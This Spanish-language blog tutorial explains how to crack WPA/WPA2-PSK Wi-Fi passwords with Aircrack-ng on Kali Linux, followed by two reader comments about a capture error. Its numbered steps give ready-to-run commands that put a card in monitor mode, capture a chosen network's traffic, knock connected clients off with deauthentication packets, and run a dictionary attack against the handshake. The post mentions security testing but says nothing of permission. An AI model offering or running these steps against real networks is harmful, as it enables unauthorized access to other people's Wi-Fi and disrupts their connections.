Crackeo de redes wifi WPA/WPA2-PSK con Aircrack-ng

Crackeo de redes wifi WPA/WPA2-PSK con Aircrack-ng

Uno de los sistemas de crackeo de redes más usado es Aircrack-ng, una suite de herramientas usada para probar la seguridad de las redes.

Para este método, usaremos una antena wifi compatible con modo monitor, esencial para capturar las redes wifi cercanas, en este caso una TP-LINK W722N.

SO: Kali Linux

 

  1. Matar procesos que impidan iniciar modo monitor

    airmon-ng check kill
  2. Montar tarjeta en modo monitor

    airmon-ng start wlan0
  3. Seleccionar red wifi para neutralizar

    airodump-ng -c 0 --bssid 00:00:00:00 --write nombre.cap wlan1mon

    -c = canal

    –bssid = la mac de la red

    –write = nombre para generar el .cap

    Esto empezará a crear el archivo .cap para luego desencriptarlo con un diccionario.

  4. Capturar el HandShake

    El Handshake es lo más importante de la captura porque es dónde se contiene la contraseña. Para capturalo, necesitaremos hacer un DeAuth a los clientes conectados.

    aireplay-ng -0 10 -a 00:00:00:00 -e nombre_de_la_red wlan0mon

     

  5. Desencriptar el archivo .cap

    Para conseguir la clave, necesitaremos un diccionario con millones de contraseñas como rockyou.txt, este puedes descargarlo

    aircrack-ng nombre-01.cap -w rockyou.txt

     

Sobre el Autor

2 Comentarios

  1. lucas

    me sale “Packets contained no EAPOL data; unable to process this AP.” mentiroso de mierda

    Responder
    • Mume

      Hola. LO primero te pido que hablemos con un poco de respeto. Y lo segundo. Ese error tiene pinta de ser de que no has capturado bien el HandShake, asegurate de que lo haces correctamente.

      Responder

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Categorías